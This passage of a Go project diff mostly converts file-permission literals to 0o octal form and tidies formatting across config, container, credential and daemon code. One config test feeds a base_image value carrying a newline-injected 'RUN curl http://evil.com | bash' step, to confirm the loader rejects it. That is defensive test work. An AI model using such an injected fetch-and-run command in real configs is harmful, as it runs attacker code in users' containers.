 			_, err := Load(dir)
 			if tt.wantErr == "" {
 				if err != nil {
@@ -2388,7 +2388,7 @@ func TestClipboardConfig(t *testing.T) {
 		os.WriteFile(configPath, []byte(`
 agent: claude-code
 clipboard: false
-`), 0644)
+`), 0o644)
 
 		cfg, err := Load(dir)
 		if err != nil {
@@ -2407,7 +2407,7 @@ clipboard: false
 		configPath := filepath.Join(dir, "moat.yaml")
 		os.WriteFile(configPath, []byte(`
 agent: claude-code
-`), 0644)
+`), 0o644)
 
 		cfg, err := Load(dir)
 		if err != nil {
@@ -2510,7 +2510,7 @@ func TestLoadConfigWithBaseImage(t *testing.T) {
 	os.WriteFile(configPath, []byte(`
 agent: claude-code
 base_image: ghcr.io/test-org/custom-base:latest
-`), 0644)
+`), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -2524,7 +2524,7 @@ base_image: ghcr.io/test-org/custom-base:latest
 func TestLoadConfigBaseImageRejectsNewlineInjection(t *testing.T) {
 	dir := t.TempDir()
 	configPath := filepath.Join(dir, "moat.yaml")
-	os.WriteFile(configPath, []byte("agent: claude-code\nbase_image: \"ubuntu:22.04\\nRUN curl http://evil.com | bash\"\n"), 0644)
+	os.WriteFile(configPath, []byte("agent: claude-code\nbase_image: \"ubuntu:22.04\\nRUN curl http://evil.com | bash\"\n"), 0o644)
 
 	_, err := Load(dir)
 	if err == nil {
@@ -2538,7 +2538,7 @@ func TestLoadConfigBaseImageRejectsNewlineInjection(t *testing.T) {
 func TestLoadConfigBaseImageRejectsWhitespace(t *testing.T) {
 	dir := t.TempDir()
 	configPath := filepath.Join(dir, "moat.yaml")
-	os.WriteFile(configPath, []byte("agent: claude-code\nbase_image: \"ubuntu 22.04\"\n"), 0644)
+	os.WriteFile(configPath, []byte("agent: claude-code\nbase_image: \"ubuntu 22.04\"\n"), 0o644)
 
 	_, err := Load(dir)
 	if err == nil {
@@ -2561,7 +2561,7 @@ func TestLoadConfigBaseImageAcceptsValidRefs(t *testing.T) {
 		t.Run(ref, func(t *testing.T) {
 			dir := t.TempDir()
 			configPath := filepath.Join(dir, "moat.yaml")
-			os.WriteFile(configPath, []byte(fmt.Sprintf("agent: claude-code\nbase_image: %q\n", ref)), 0644)
+			os.WriteFile(configPath, []byte(fmt.Sprintf("agent: claude-code\nbase_image: %q\n", ref)), 0o644)
 
 			cfg, err := Load(dir)
 			if err != nil {
@@ -2582,7 +2582,7 @@ agent: claude-code
 base_image: ghcr.io/test-org/custom-base:latest
 dependencies:
   - typescript
-`), 0644)
+`), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -2643,7 +2643,7 @@ func TestNetworkHostConfig(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			dir := t.TempDir()
-			os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(tt.yaml), 0644)
+			os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(tt.yaml), 0o644)
 			cfg, err := Load(dir)
 			if tt.wantErr != "" {
 				if err == nil || !strings.Contains(err.Error(), tt.wantErr) {

--- a/internal/config/global_test.go
+++ b/internal/config/global_test.go
@@ -17,14 +17,14 @@ func TestLoadGlobalConfig(t *testing.T) {
 
 	// Create config file
 	configDir := filepath.Join(tmpHome, ".moat")
-	os.MkdirAll(configDir, 0755)
+	os.MkdirAll(configDir, 0o755)
 	configPath := filepath.Join(configDir, "config.yaml")
 
 	content := `
 proxy:
   port: 9000
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := LoadGlobal()
 	if err != nil {
@@ -75,7 +75,7 @@ func TestLoadGlobal_DebugConfig(t *testing.T) {
 	// Create temp config file
 	tmpDir := t.TempDir()
 	configPath := filepath.Join(tmpDir, "config.yaml")
-	err := os.WriteFile(configPath, []byte("debug:\n  retention_days: 7\n"), 0644)
+	err := os.WriteFile(configPath, []byte("debug:\n  retention_days: 7\n"), 0o644)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -88,7 +88,7 @@ func TestLoadGlobal_DebugConfig(t *testing.T) {
 
 	// Create .moat directory and move config
 	moatDir := filepath.Join(tmpDir, ".moat")
-	os.MkdirAll(moatDir, 0755)
+	os.MkdirAll(moatDir, 0o755)
 	os.Rename(configPath, filepath.Join(moatDir, "config.yaml"))
 
 	cfg, err := LoadGlobal()
@@ -107,7 +107,7 @@ func TestLoadGlobal_Mounts(t *testing.T) {
 	t.Setenv("MOAT_HOME", "")
 
 	moatDir := filepath.Join(tmpHome, ".moat")
-	os.MkdirAll(moatDir, 0755)
+	os.MkdirAll(moatDir, 0o755)
 
 	content := `
 mounts:
@@ -116,7 +116,7 @@ mounts:
     mode: ro
   - /home/user/.moat/scripts/helper.sh:/home/user/.local/bin/helper.sh:ro
 `
-	os.WriteFile(filepath.Join(moatDir, "config.yaml"), []byte(content), 0644)
+	os.WriteFile(filepath.Join(moatDir, "config.yaml"), []byte(content), 0o644)
 
 	cfg, err := LoadGlobal()
 	if err != nil {
@@ -153,14 +153,14 @@ func TestLoadGlobal_MountsRelativeSourceRejected(t *testing.T) {
 	t.Setenv("MOAT_HOME", "")
 
 	moatDir := filepath.Join(tmpHome, ".moat")
-	os.MkdirAll(moatDir, 0755)
+	os.MkdirAll(moatDir, 0o755)
 
 	content := `
 mounts:
   - source: ./relative/path
     target: /container/path
 `
-	os.WriteFile(filepath.Join(moatDir, "config.yaml"), []byte(content), 0644)
+	os.WriteFile(filepath.Join(moatDir, "config.yaml"), []byte(content), 0o644)
 
 	_, err := LoadGlobal()
 	if err == nil {
@@ -177,7 +177,7 @@ func TestLoadGlobal_MountsExcludeRejected(t *testing.T) {
 	t.Setenv("MOAT_HOME", "")
 
 	moatDir := filepath.Join(tmpHome, ".moat")
-	os.MkdirAll(moatDir, 0755)
+	os.MkdirAll(moatDir, 0o755)
 
 	content := `
 mounts:
@@ -186,7 +186,7 @@ mounts:
     exclude:
       - node_modules
 `
-	os.WriteFile(filepath.Join(moatDir, "config.yaml"), []byte(content), 0644)
+	os.WriteFile(filepath.Join(moatDir, "config.yaml"), []byte(content), 0o644)
 
 	_, err := LoadGlobal()
 	if err == nil {
@@ -203,14 +203,14 @@ func TestLoadGlobal_MountsTildeExpansion(t *testing.T) {
 	t.Setenv("MOAT_HOME", "")
 
 	moatDir := filepath.Join(tmpHome, ".moat")
-	os.MkdirAll(moatDir, 0755)
+	os.MkdirAll(moatDir, 0o755)
 
 	content := `
 mounts:
   - source: ~/.moat/scripts/statusline.js
     target: /home/user/.claude/moat/statusline.js
 `
-	os.WriteFile(filepath.Join(moatDir, "config.yaml"), []byte(content), 0644)
+	os.WriteFile(filepath.Join(moatDir, "config.yaml"), []byte(content), 0o644)
 
 	cfg, err := LoadGlobal()
 	if err != nil {
@@ -233,7 +233,7 @@ func TestLoadGlobal_MountsEnforcesReadOnly(t *testing.T) {
 	t.Setenv("MOAT_HOME", "")
 
 	moatDir := filepath.Join(tmpHome, ".moat")
-	os.MkdirAll(moatDir, 0755)
+	os.MkdirAll(moatDir, 0o755)
 
 	// Mount specified as rw — should be forced to ro
 	content := `
@@ -242,7 +242,7 @@ mounts:
     target: /data
     mode: rw
 `
-	os.WriteFile(filepath.Join(moatDir, "config.yaml"), []byte(content), 0644)
+	os.WriteFile(filepath.Join(moatDir, "config.yaml"), []byte(content), 0o644)
 
 	cfg, err := LoadGlobal()
 	if err != nil {

--- a/internal/config/integration_test.go
+++ b/internal/config/integration_test.go
@@ -27,12 +27,12 @@ env:
 mounts:
   - ./data:/data:ro
 `
-	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(yaml), 0644); err != nil {
+	if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(yaml), 0o644); err != nil {
 		t.Fatal(err)
 	}
 
 	// Create data directory
-	if err := os.MkdirAll(filepath.Join(dir, "data"), 0755); err != nil {
+	if err := os.MkdirAll(filepath.Join(dir, "data"), 0o755); err != nil {
 		t.Fatal(err)
 	}
 

--- a/internal/config/volume_test.go
+++ b/internal/config/volume_test.go
@@ -46,7 +46,7 @@ volumes:
     target: /var/cache/myapp
     readonly: true
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	cfg, err := Load(dir)
 	if err != nil {
@@ -82,7 +82,7 @@ volumes:
   - name: state
     target: /data
 `
-	os.WriteFile(configPath, []byte(content), 0644)
+	os.WriteFile(configPath, []byte(content), 0o644)
 
 	_, err := Load(dir)
 	if err == nil {
@@ -233,7 +233,7 @@ volumes:
 		t.Run(tt.name, func(t *testing.T) {
 			dir := t.TempDir()
 			configPath := filepath.Join(dir, "moat.yaml")
-			os.WriteFile(configPath, []byte(tt.content), 0644)
+			os.WriteFile(configPath, []byte(tt.content), 0o644)
 
 			_, err := Load(dir)
 			if err == nil {
@@ -263,7 +263,7 @@ func TestLoadConfigVolumeTypesValid(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			dir := t.TempDir()
-			if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(tt.content), 0644); err != nil {
+			if err := os.WriteFile(filepath.Join(dir, "moat.yaml"), []byte(tt.content), 0o644); err != nil {
 				t.Fatal(err)
 			}
 			cfg, err := Load(dir)
@@ -290,7 +290,7 @@ volumes:
   - name: ` + name + `
     target: /data
 `
-			os.WriteFile(configPath, []byte(content), 0644)
+			os.WriteFile(configPath, []byte(content), 0o644)
 
 			_, err := Load(dir)
 			if err != nil {

--- a/internal/container/apple.go
+++ b/internal/container/apple.go
@@ -813,7 +813,7 @@ func (m *appleBuildManager) BuildImage(ctx context.Context, dockerfile string, t
 	defer os.RemoveAll(tmpDir)
 
 	dockerfilePath := filepath.Join(tmpDir, "Dockerfile")
-	if err := os.WriteFile(dockerfilePath, []byte(dockerfile), 0644); err != nil {
+	if err := os.WriteFile(dockerfilePath, []byte(dockerfile), 0o644); err != nil {
 		return fmt.Errorf("writing Dockerfile: %w", err)
 	}
 
@@ -822,11 +822,11 @@ func (m *appleBuildManager) BuildImage(ctx context.Context, dockerfile string, t
 		path := filepath.Join(tmpDir, name)
 		// Create parent directories if needed
 		if dir := filepath.Dir(path); dir != tmpDir {
-			if err := os.MkdirAll(dir, 0755); err != nil {
+			if err := os.MkdirAll(dir, 0o755); err != nil {
 				return fmt.Errorf("creating context dir for %s: %w", name, err)
 			}
 		}
-		if err := os.WriteFile(path, content, 0644); err != nil {
+		if err := os.WriteFile(path, content, 0o644); err != nil {
 			return fmt.Errorf("writing context file %s: %w", name, err)
 		}
 	}
@@ -866,7 +866,8 @@ func (m *appleBuildManager) runBuild(ctx context.Context, dockerfilePath, tag st
 	if cpus < 2 {
 		cpus = 2
 	}
-	args := []string{"build",
+	args := []string{
+		"build",
 		"-f", dockerfilePath,
 		"-t", tag,
 		"--cpus", strconv.Itoa(cpus),
@@ -922,7 +923,8 @@ func (m *appleBuildManager) startBuilder(ctx context.Context) error {
 		cpus = 2
 	}
 
-	args := []string{"builder", "start",
+	args := []string{
+		"builder", "start",
 		"--cpus", strconv.Itoa(cpus),
 		"--memory", "8192MB",
 	}

--- a/internal/container/docker.go
+++ b/internal/container/docker.go
@@ -1527,7 +1527,7 @@ func prepareBuildContext(dockerfile string, opts BuildOptions) (tmpDir string, p
 	}
 
 	dockerfilePath := filepath.Join(tmpDir, "Dockerfile")
-	if writeErr := os.WriteFile(dockerfilePath, []byte(dockerfile), 0644); writeErr != nil {
+	if writeErr := os.WriteFile(dockerfilePath, []byte(dockerfile), 0o644); writeErr != nil {
 		os.RemoveAll(tmpDir)
 		return "", "", fmt.Errorf("writing Dockerfile: %w", writeErr)
 	}
@@ -1535,12 +1535,12 @@ func prepareBuildContext(dockerfile string, opts BuildOptions) (tmpDir string, p
 	for name, content := range opts.ContextFiles {
 		path := filepath.Join(tmpDir, name)
 		if dir := filepath.Dir(path); dir != tmpDir {
-			if mkdirErr := os.MkdirAll(dir, 0755); mkdirErr != nil {
+			if mkdirErr := os.MkdirAll(dir, 0o755); mkdirErr != nil {
 				os.RemoveAll(tmpDir)
 				return "", "", fmt.Errorf("creating context dir for %s: %w", name, mkdirErr)
 			}
 		}
-		if writeErr := os.WriteFile(path, content, 0644); writeErr != nil {
+		if writeErr := os.WriteFile(path, content, 0o644); writeErr != nil {
 			os.RemoveAll(tmpDir)
 			return "", "", fmt.Errorf("writing context file %s: %w", name, writeErr)
 		}
@@ -1631,7 +1631,7 @@ func (m *dockerBuildManager) buildImageWithBuilder(ctx context.Context, dockerfi
 	// Add Dockerfile to tar
 	header := &tar.Header{
 		Name: "Dockerfile",
-		Mode: 0644,
+		Mode: 0o644,
 		Size: int64(len(dockerfile)),
 	}
 	if err := tw.WriteHeader(header); err != nil {
@@ -1645,7 +1645,7 @@ func (m *dockerBuildManager) buildImageWithBuilder(ctx context.Context, dockerfi
 	for name, content := range opts.ContextFiles {
 		h := &tar.Header{
 			Name: name,
-			Mode: 0644,
+			Mode: 0o644,
 			Size: int64(len(content)),
 		}
 		if err := tw.WriteHeader(h); err != nil {

--- a/internal/container/pool_test.go
+++ b/internal/container/pool_test.go
@@ -84,36 +84,47 @@ func (s *poolStubRuntime) Ping(context.Context) error { panic("not implemented")
 func (s *poolStubRuntime) CreateContainer(context.Context, Config) (string, error) {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) StartContainer(context.Context, string) error {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) VolumeCreate(context.Context, string) error {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) VolumeRemove(context.Context, string, bool) error {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) VolumeList(context.Context, string) ([]string, error) {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) VolumeExport(context.Context, string, string) error {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) StopContainer(context.Context, string) error {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) WaitContainer(context.Context, string) (int64, error) {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) RemoveContainer(context.Context, string) error {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) ContainerLogs(context.Context, string) (io.ReadCloser, error) {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) ContainerLogsAll(context.Context, string) ([]byte, error) {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) GetPortBindings(context.Context, string) (map[int]int, error) {
 	panic("not implemented")
 }
@@ -126,27 +137,35 @@ func (s *poolStubRuntime) ServiceManager() ServiceManager { return nil }
 func (s *poolStubRuntime) SetupFirewall(context.Context, string, string, int) error {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) ListImages(context.Context) ([]ImageInfo, error) {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) ListContainers(context.Context) ([]Info, error) {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) ContainerState(context.Context, string) (string, error) {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) RemoveImage(context.Context, string) error {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) StartAttached(context.Context, string, AttachOptions) error {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) ResizeTTY(context.Context, string, uint, uint) error {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) Exec(context.Context, string, []string, []byte, io.Writer, io.Writer) error {
 	panic("not implemented")
 }
+
 func (s *poolStubRuntime) ExecInteractive(context.Context, string, []string, ExecOptions) error {
 	panic("not implemented")
 }

--- a/internal/container/runtime.go
+++ b/internal/container/runtime.go
@@ -394,7 +394,7 @@ type TmpfsMount struct {
 // tmpfsMode is the permission mode for tmpfs overlays. Sticky world-writable
 // (01777) so non-root container users can write — runc otherwise defaults
 // tmpfs to 0755 owned by root.
-const tmpfsMode = 01777
+const tmpfsMode = 0o1777
 
 // ImageInfo contains information about a container image.
 type ImageInfo struct {

--- a/internal/credential/claude_test.go
+++ b/internal/credential/claude_test.go
@@ -66,7 +66,7 @@ func TestClaudeCodeCredentials_GetFromFile(t *testing.T) {
 
 	// Create .claude directory
 	claudeDir := filepath.Join(tempDir, ".claude")
-	if err := os.MkdirAll(claudeDir, 0755); err != nil {
+	if err := os.MkdirAll(claudeDir, 0o755); err != nil {
 		t.Fatalf("Failed to create test directory: %v", err)
 	}
 
@@ -82,7 +82,7 @@ func TestClaudeCodeCredentials_GetFromFile(t *testing.T) {
 			"rateLimitTier": "default"
 		}
 	}`
-	if err := os.WriteFile(credFile, []byte(testCreds), 0600); err != nil {
+	if err := os.WriteFile(credFile, []byte(testCreds), 0o600); err != nil {
 		t.Fatalf("Failed to write test credentials: %v", err)
 	}
 
@@ -132,12 +132,12 @@ func TestClaudeCodeCredentials_GetFromFile_NoOAuth(t *testing.T) {
 	tempDir := t.TempDir()
 
 	claudeDir := filepath.Join(tempDir, ".claude")
-	if err := os.MkdirAll(claudeDir, 0755); err != nil {
+	if err := os.MkdirAll(claudeDir, 0o755); err != nil {
 		t.Fatalf("Failed to create test directory: %v", err)
 	}
 
 	credFile := filepath.Join(claudeDir, ".credentials.json")
-	if err := os.WriteFile(credFile, []byte(`{}`), 0600); err != nil {
+	if err := os.WriteFile(credFile, []byte(`{}`), 0o600); err != nil {
 		t.Fatalf("Failed to write test credentials: %v", err)
 	}
 
@@ -187,13 +187,13 @@ func TestClaudeCodeCredentials_HasClaudeCodeCredentials(t *testing.T) {
 	tempDir := t.TempDir()
 
 	claudeDir := filepath.Join(tempDir, ".claude")
-	if err := os.MkdirAll(claudeDir, 0755); err != nil {
+	if err := os.MkdirAll(claudeDir, 0o755); err != nil {
 		t.Fatalf("Failed to create test directory: %v", err)
 	}
 
 	credFile := filepath.Join(claudeDir, ".credentials.json")
 	testCreds := `{"claudeAiOauth": {"accessToken": "test", "expiresAt": 1768957840059}}`
-	if err := os.WriteFile(credFile, []byte(testCreds), 0600); err != nil {
+	if err := os.WriteFile(credFile, []byte(testCreds), 0o600); err != nil {
 		t.Fatalf("Failed to write test credentials: %v", err)
 	}
 

--- a/internal/credential/keyring/keyring.go
+++ b/internal/credential/keyring/keyring.go
@@ -152,7 +152,7 @@ func (f *fileBackend) Get() ([]byte, error) {
 		return nil, fmt.Errorf("reading key file: %w", err)
 	}
 	perm := info.Mode().Perm()
-	if perm&0077 != 0 {
+	if perm&0o077 != 0 {
 		return nil, fmt.Errorf("%w: %s has permissions %04o (expected 0600).\n"+
 			"  The key may have been exposed. To fix:\n"+
 			"  1. chmod 600 %s\n"+
@@ -170,7 +170,7 @@ func (f *fileBackend) Get() ([]byte, error) {
 
 func (f *fileBackend) Set(key []byte) error {
 	dir := filepath.Dir(f.path)
-	if err := os.MkdirAll(dir, 0700); err != nil {
+	if err := os.MkdirAll(dir, 0o700); err != nil {
 		return fmt.Errorf("creating key directory: %w", err)
 	}
 
@@ -180,7 +180,7 @@ func (f *fileBackend) Set(key []byte) error {
 	// the stale .lock file is harmless and can be safely deleted manually.
 	// The next process will create a new lock file.
 	lockPath := f.path + ".lock"
-	lf, err := os.OpenFile(lockPath, os.O_CREATE|os.O_RDWR, 0600)
+	lf, err := os.OpenFile(lockPath, os.O_CREATE|os.O_RDWR, 0o600)
 	if err != nil {
 		return fmt.Errorf("creating lock file: %w", err)
 	}
@@ -201,7 +201,7 @@ func (f *fileBackend) Set(key []byte) error {
 	}
 
 	encoded := encodeKey(key)
-	if err := os.WriteFile(f.path, []byte(encoded), 0600); err != nil {
+	if err := os.WriteFile(f.path, []byte(encoded), 0o600); err != nil {
 		return fmt.Errorf("writing key file: %w", err)
 	}
 	return nil
@@ -296,11 +296,11 @@ func withGlobalKeyLock(fn func() ([]byte, error)) ([]byte, error) {
 	}
 
 	// Ensure lock directory exists
-	if mkErr := os.MkdirAll(filepath.Dir(lockPath), 0700); mkErr != nil {
+	if mkErr := os.MkdirAll(filepath.Dir(lockPath), 0o700); mkErr != nil {
 		return nil, fmt.Errorf("creating lock directory: %w", mkErr)
 	}
 
-	lf, err := os.OpenFile(lockPath, os.O_CREATE|os.O_RDWR, 0600)
+	lf, err := os.OpenFile(lockPath, os.O_CREATE|os.O_RDWR, 0o600)
 	if err != nil {
 		return nil, fmt.Errorf("creating global key lock file: %w", err)
 	}

--- a/internal/credential/keyring/keyring_test.go
+++ b/internal/credential/keyring/keyring_test.go
@@ -438,7 +438,7 @@ func TestFileBackend(t *testing.T) {
 	if err != nil {
 		t.Fatalf("Stat failed: %v", err)
 	}
-	if info.Mode().Perm() != 0600 {
+	if info.Mode().Perm() != 0o600 {
 		t.Errorf("wrong permissions: got %o, want 0600", info.Mode().Perm())
 	}
 
@@ -494,7 +494,7 @@ func TestFileBackendTrimsWhitespace(t *testing.T) {
 	if err != nil {
 		t.Fatalf("ReadFile: %v", err)
 	}
-	if err := os.WriteFile(keyPath, append(data, '\n', '\n', ' ', '\n'), 0600); err != nil {
+	if err := os.WriteFile(keyPath, append(data, '\n', '\n', ' ', '\n'), 0o600); err != nil {
 		t.Fatalf("WriteFile: %v", err)
 	}
 
@@ -678,10 +678,10 @@ func TestFileExistsAfterLockAcquired(t *testing.T) {
 		existingKey[i] = byte(i + 50)
 	}
 	encoded := encodeKey(existingKey)
-	if err := os.MkdirAll(tmpDir, 0700); err != nil {
+	if err := os.MkdirAll(tmpDir, 0o700); err != nil {
 		t.Fatalf("MkdirAll: %v", err)
 	}
-	if err := os.WriteFile(keyPath, []byte(encoded), 0600); err != nil {
+	if err := os.WriteFile(keyPath, []byte(encoded), 0o600); err != nil {
 		t.Fatalf("WriteFile: %v", err)
 	}
 

--- a/internal/credential/ssh.go
+++ b/internal/credential/ssh.go
@@ -89,7 +89,7 @@ func (s *FileStore) AddSSHMapping(mapping SSHMapping) error {
 	if err != nil {
 		return err
 	}
-	return os.WriteFile(s.sshPath(), data, 0600)
+	return os.WriteFile(s.sshPath(), data, 0o600)
 }
 
 // RemoveSSHMapping removes an SSH mapping for a host.
@@ -111,5 +111,5 @@ func (s *FileStore) RemoveSSHMapping(host string) error {
 	if err != nil {
 		return err
 	}
-	return os.WriteFile(s.sshPath(), data, 0600)
+	return os.WriteFile(s.sshPath(), data, 0o600)
 }

--- a/internal/credential/store.go
+++ b/internal/credential/store.go
@@ -33,7 +33,7 @@ func NewFileStore(dir string, key []byte) (*FileStore, error) {
 		return nil, fmt.Errorf("key must be 32 bytes, got %d", len(key))
 	}
 
-	if err := os.MkdirAll(dir, 0700); err != nil {
+	if err := os.MkdirAll(dir, 0o700); err != nil {
 		return nil, fmt.Errorf("creating credential dir: %w", err)
 	}
 
@@ -80,7 +80,7 @@ func (s *FileStore) Save(cred Credential) error {
 	}
 
 	encrypted := s.cipher.Seal(nonce, nonce, data, nil)
-	if err := os.WriteFile(s.path(cred.Provider), encrypted, 0600); err != nil {
+	if err := os.WriteFile(s.path(cred.Provider), encrypted, 0o600); err != nil {
 		return fmt.Errorf("writing credential file: %w", err)
 	}
 

--- a/internal/credential/store_test.go
+++ b/internal/credential/store_test.go
@@ -300,8 +300,8 @@ func TestListProfiles(t *testing.T) {
 
 	// Create some profile directories
 	profilesDir := filepath.Join(tmpHome, ".moat", "credentials", "profiles")
-	os.MkdirAll(filepath.Join(profilesDir, "alpha"), 0700)
-	os.MkdirAll(filepath.Join(profilesDir, "beta"), 0700)
+	os.MkdirAll(filepath.Join(profilesDir, "alpha"), 0o700)
+	os.MkdirAll(filepath.Join(profilesDir, "beta"), 0o700)
 
 	profiles, err = ListProfiles()
 	if err != nil {
@@ -524,9 +524,9 @@ func TestListProfiles_IgnoresFiles(t *testing.T) {
 	t.Setenv("MOAT_HOME", "")
 
 	profilesDir := filepath.Join(tmpHome, ".moat", "credentials", "profiles")
-	os.MkdirAll(filepath.Join(profilesDir, "real-profile"), 0700)
+	os.MkdirAll(filepath.Join(profilesDir, "real-profile"), 0o700)
 	// Create a regular file that should be ignored
-	os.WriteFile(filepath.Join(profilesDir, "not-a-profile.txt"), []byte("junk"), 0600)
+	os.WriteFile(filepath.Join(profilesDir, "not-a-profile.txt"), []byte("junk"), 0o600)
 
 	profiles, err := ListProfiles()
 	if err != nil {

--- a/internal/daemon/lifecycle.go
+++ b/internal/daemon/lifecycle.go
@@ -46,7 +46,7 @@ func (l *LockInfo) IsAlive() bool {
 
 // WriteLockFile writes the daemon lock file.
 func WriteLockFile(dir string, info LockInfo) error {
-	if err := os.MkdirAll(dir, 0700); err != nil {
+	if err := os.MkdirAll(dir, 0o700); err != nil {
 		return err
 	}
 	if info.StartedAt.IsZero() {
@@ -56,7 +56,7 @@ func WriteLockFile(dir string, info LockInfo) error {
 	if err != nil {
 		return err
 	}
-	return os.WriteFile(filepath.Join(dir, lockFileName), data, 0644)
+	return os.WriteFile(filepath.Join(dir, lockFileName), data, 0o644)
 }
 
 // ReadLockFile reads the daemon lock file. Returns nil, nil if not found.
@@ -87,7 +87,7 @@ func RemoveLockFile(dir string) {
 // callers don't each spawn a separate daemon process.
 func EnsureRunning(dir string, proxyPort int) (*Client, error) {
 	// Ensure the directory exists before taking the spawn lock.
-	if err := os.MkdirAll(dir, 0700); err != nil {
+	if err := os.MkdirAll(dir, 0o700); err != nil {
 		return nil, fmt.Errorf("creating daemon directory: %w", err)
 	}
 
@@ -189,7 +189,8 @@ func spawnDaemon(dir string, proxyPort int, prev *LockInfo) (*Client, error) {
 		return nil, err
 	}
 
-	args := []string{exe, "_daemon",
+	args := []string{
+		exe, "_daemon",
 		"--dir", dir,
 		"--proxy-port", fmt.Sprintf("%d", proxyPort),
 	}
@@ -204,7 +205,7 @@ func spawnDaemon(dir string, proxyPort int, prev *LockInfo) (*Client, error) {
 
 	// Send daemon stderr to a log file for debugging startup failures.
 	logPath := filepath.Join(dir, "daemon.log")
-	logFile, err := os.OpenFile(logPath, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0644)
+	logFile, err := os.OpenFile(logPath, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0o644)
 	logFileOwned := err == nil // track whether we opened a separate file
 	if !logFileOwned {
 		logFile = devNull // non-fatal; discard output rather than passing nil fds
@@ -282,7 +283,7 @@ func commitKnown(commit string) bool {
 // The returned bool reports whether an existing daemon was stopped (true) or
 // nothing was running and a fresh daemon was simply started (false).
 func Restart(dir string, proxyPort int) (*Client, bool, error) {
-	if err := os.MkdirAll(dir, 0700); err != nil {
+	if err := os.MkdirAll(dir, 0o700); err != nil {
 		return nil, false, fmt.Errorf("creating daemon directory: %w", err)
 	}
 
@@ -392,7 +393,7 @@ func waitForExit(pid int, timeout time.Duration) bool {
 // spawning. Returns an unlock function that must be called (typically deferred).
 func acquireSpawnLock(dir string) (unlock func(), err error) {
 	lockPath := filepath.Join(dir, spawnLockFileName)
-	f, err := os.OpenFile(lockPath, os.O_CREATE|os.O_RDWR, 0644)
+	f, err := os.OpenFile(lockPath, os.O_CREATE|os.O_RDWR, 0o644)
 	if err != nil {
 		return nil, err
 	}

--- a/internal/daemon/lifecycle_test.go
+++ b/internal/daemon/lifecycle_test.go
@@ -161,7 +161,7 @@ func TestLockFile_CorruptedData(t *testing.T) {
 	dir := t.TempDir()
 	lockPath := filepath.Join(dir, lockFileName)
 
-	if err := os.WriteFile(lockPath, []byte("not valid json"), 0644); err != nil {
+	if err := os.WriteFile(lockPath, []byte("not valid json"), 0o644); err != nil {
 		t.Fatal(err)
 	}
 

--- a/internal/daemon/persist.go
+++ b/internal/daemon/persist.go
@@ -106,7 +106,7 @@ func (p *RunPersister) Save() error {
 		os.Remove(tmpName)
 		return fmt.Errorf("write temp file: %w", err)
 	}
-	if err := tmp.Chmod(0600); err != nil {
+	if err := tmp.Chmod(0o600); err != nil {
 		tmp.Close()
 		os.Remove(tmpName)
 		return fmt.Errorf("chmod temp file: %w", err)

--- a/internal/daemon/persist_test.go
+++ b/internal/daemon/persist_test.go
@@ -156,7 +156,7 @@ func TestRunPersister_FilePermissions(t *testing.T) {
 		t.Fatalf("Stat: %v", err)
 	}
 	perm := info.Mode().Perm()
-	if perm != 0600 {
+	if perm != 0o600 {
 		t.Errorf("file permissions = %o, want 0600", perm)
 	}
 }
@@ -379,7 +379,7 @@ func TestRunPersister_LoadLegacyFormat(t *testing.T) {
 
 	// Write a legacy bare-array format.
 	legacy := `[{"auth_token":"tok-1","run_id":"run-1"}]`
-	if err := os.WriteFile(path, []byte(legacy), 0600); err != nil {
+	if err := os.WriteFile(path, []byte(legacy), 0o600); err != nil {
 		t.Fatalf("WriteFile: %v", err)
 	}
 

--- a/internal/daemon/refresh_test.go
+++ b/internal/daemon/refresh_test.go
@@ -217,9 +217,11 @@ func (f *fakeRefreshableProvider) ImpliedDependencies() []string { return nil }
 func (f *fakeRefreshableProvider) CanRefresh(*provider.Credential) bool {
 	return true
 }
+
 func (f *fakeRefreshableProvider) RefreshInterval() time.Duration {
 	return 5 * time.Minute
 }
+
 func (f *fakeRefreshableProvider) Refresh(_ context.Context, _ provider.ProxyConfigurer, old *provider.Credential) (*provider.Credential, error) {
 	return &provider.Credential{
 		Token:     f.newToken,
@@ -246,6 +248,7 @@ func (s *fakeStore) Save(c credential.Credential) error {
 	s.creds[c.Provider] = &c
 	return nil
 }
+
 func (s *fakeStore) Get(p credential.Provider) (*credential.Credential, error) {
 	c, ok := s.creds[p]
 	if !ok {

--- a/internal/deps/dockerfile.go
+++ b/internal/deps/dockerfile.go
@@ -79,8 +79,10 @@ func runtimeBaseImage(name, version string) string {
 // Many base images have a default user at UID 1000, and deleting that user
 // doesn't change ownership of their files - the new user would inherit access.
 // UID 5000 is safely above the typical user range (1000-4999).
-const containerUser = "moatuser"
-const containerUID = "5000"
+const (
+	containerUser = "moatuser"
+	containerUID  = "5000"
